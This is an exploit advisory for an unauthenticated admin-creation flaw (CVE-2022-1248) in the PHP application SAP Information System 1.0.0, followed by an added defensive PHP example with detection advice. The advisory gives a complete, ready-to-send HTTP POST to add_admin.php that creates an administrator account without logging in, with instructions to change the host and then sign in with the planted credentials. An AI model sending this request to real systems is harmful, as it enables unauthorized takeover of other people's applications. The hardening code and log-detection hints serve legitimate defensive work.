# Exploit Title: SAP Information System 1.0.0 - Improper Authentication
# Date: 06/04/2022
# CVE: CVE-2022-1248
# Exploit Author: Mr Empy
# Software Link: https://www.sourcecodester.com/php/15262/sap-information-system-using-phppdo-oop.html
# Version: 1.0.0
# Tested on: Linux

Title:
================
SAP Information System 1.0.0 - Improper Authentication

Summary:
================
SAP Information System version 1.0.0 suffers from an improper authentication
vulnerability that allows a malicious user to create an administrative account
without needing to authenticate. The POST request is sent to the
/SAP_Information_System/controllers/add_admin.php endpoint. The problem occurs
due to a lack of session verification in the handling of that request.

Severity Level:
================
7.3 (High)
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Affected Product:
================
SAP Information System version v1.0.0

Steps to Reproduce:
================
1. Copy this request, change the host, and send it to the server:

############################################
POST /SAP_Information_System/controllers/add_admin.php HTTP/1.1
Host: target.com
Content-Length: 345
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYELEK8fMdX63l0iI
Origin: http://target.com
Referer: http://target.com/SAP_Information_System/Dashboard/pages/Admin.php
Accept-Encoding: gzip, deflate
Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=jjnkf4nmpdm7sca82btt2r4s1c
Connection: close

------WebKitFormBoundaryYELEK8fMdX63l0iI
Content-Disposition: form-data; name="username"

hacker
------WebKitFormBoundaryYELEK8fMdX63l0iI
Content-Disposition: form-data; name="password"

P@ssw0rd!
------WebKitFormBoundaryYELEK8fMdX63l0iI
Content-Disposition: form-data; name="user"

admin
------WebKitFormBoundaryYELEK8fMdX63l0iI--
############################################

Reply:

############################################
HTTP/1.1 200 OK
Date: Tue, 05 Apr 2022 16:15:46 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 267
Connection: close
Content-Type: text/html; charset=UTF-8
############################################

2. Go to the login page and enter the hacker:P@ssw0rd! credential. After that
you will be logged in with an administrative account.
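Defensive counterpart to the finding above, added here as an example; it is not code from the advisory or from the SAP Information System project. It shows the session verification that an "add admin" controller such as add_admin.php must perform before it touches the database, and it goes slightly beyond the page's stated finding by also checking a CSRF token and hashing the stored password. The session keys ($_SESSION['user_id'], $_SESSION['role'], $_SESSION['csrf_token']), the $pdo handle, the users table layout and the accepted role values are assumptions; the form field names (username, password, user) are those seen in the request above.

```php
<?php
// Added example, not the project's own code.
// Assumptions: the login controller stores the authenticated user's id in
// $_SESSION['user_id'] and their role in $_SESSION['role'], issues a per-session
// CSRF token in $_SESSION['csrf_token'], and a PDO connection exists in $pdo.
declare(strict_types=1);

session_start();

// Deny by default: the vulnerable pattern simply reads $_POST and inserts;
// the fix is to refuse any request that is not tied to an authenticated
// administrator's session before doing anything else.
function require_admin_session(): void
{
    if (empty($_SESSION['user_id']) || (($_SESSION['role'] ?? '') !== 'admin')) {
        http_response_code(403);
        header('Content-Type: application/json');
        echo json_encode(['status' => 'error', 'message' => 'Authentication required']);
        exit;
    }
}

// A state-changing POST must also carry a token bound to this session,
// otherwise a logged-in admin's browser could be made to submit it from
// another site. hash_equals() avoids a timing side channel on the comparison.
function require_csrf_token(): void
{
    $expected = (string)($_SESSION['csrf_token'] ?? '');
    $given    = (string)($_POST['csrf_token'] ?? '');
    if ($expected === '' || !hash_equals($expected, $given)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
}

if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    http_response_code(405);
    exit;
}

require_admin_session();
require_csrf_token();

// Field names match the multipart request shown in the advisory.
$username = trim((string)($_POST['username'] ?? ''));
$password = (string)($_POST['password'] ?? '');
$role     = (string)($_POST['user'] ?? '');

// Assumed allow-list of roles; reject anything else rather than storing it.
$allowedRoles = ['admin', 'user'];
if ($username === '' || strlen($password) < 12 || !in_array($role, $allowedRoles, true)) {
    http_response_code(400);
    exit('Invalid input');
}

// Assumed table layout. Parameterised query; store only a password hash.
$stmt = $pdo->prepare('INSERT INTO users (username, password, role) VALUES (:u, :p, :r)');
$stmt->execute([
    ':u' => $username,
    ':p' => password_hash($password, PASSWORD_DEFAULT),
    ':r' => $role,
]);

header('Content-Type: application/json');
echo json_encode(['status' => 'success']);
```

The check order matters: authentication and the CSRF check run before any input is read or validated, so an unauthenticated request (the case the advisory describes) is rejected with 403 and never reaches the INSERT. On the detection side, a 200 response from add_admin.php for a request whose PHPSESSID has no logged-in session, or new rows in the admin table with no matching login event, is the signal to look for in existing logs.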